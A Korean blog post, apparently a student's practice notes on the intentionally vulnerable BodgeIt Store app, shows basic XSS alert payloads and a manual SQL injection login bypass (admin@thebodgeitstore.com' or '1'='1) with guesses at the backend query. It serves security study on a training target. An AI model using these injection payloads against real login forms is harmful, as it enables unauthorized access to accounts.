------------------------------

 

script 공격

 

<script>alert("taktaktaktak")</script>

 

 

 

 

 

<script>alert('taktaktak')</scirpt>

 

 

 

---------------------------------------

 

 

sqlmap은 적용이되지않는다.

 

 

 

 

 

---------------------------------

 

 

 

 

- ----------------------------

 

5글자를 넣으라고한다.

 

 

 

 

 

 

about us 

들어가서!

 

저것을복사해본다

 

 

admin@thebodgeitstore.com

 

 

 

 

 

 

 

admin@thebodgeitstore.com' or '1'='1'#

 

주석처리가 불가능하다

 

select * from user where username='--' and password=''

 

원래는 주석처리가되서 로그인이되면

 

이번것은

 

select * from user where

username='admin@thebodgeitstore.com' or '1'='1' and

password='aaaaa'

 

 

 

이렇게 추측을 한다.

5글자의 단서가 아니면 불가능한것이였다

 

 

 

 

 

 

admin@thebodgeitstore.com' or '1'='1

aaaa 

 

이렇게하게된다면

 

 

 

 

 

 

성공하였다! 

'Web hacking' 카테고리의 다른 글

owasp 실습(bwapp) -2 (sql injection blind time based)  (0) 2020.12.08
owasp 실습(bwapp) -1 (SQL injection blind boolean based)  (0) 2020.12.08
owasp 실습(WackoPicko)  (0) 2020.12.07
owasp 실습 (peruggia)  (0) 2020.12.07
파일업로드 취약점,소스코드공개될때 가능한취약점  (0) 2020.12.01

티스토리툴바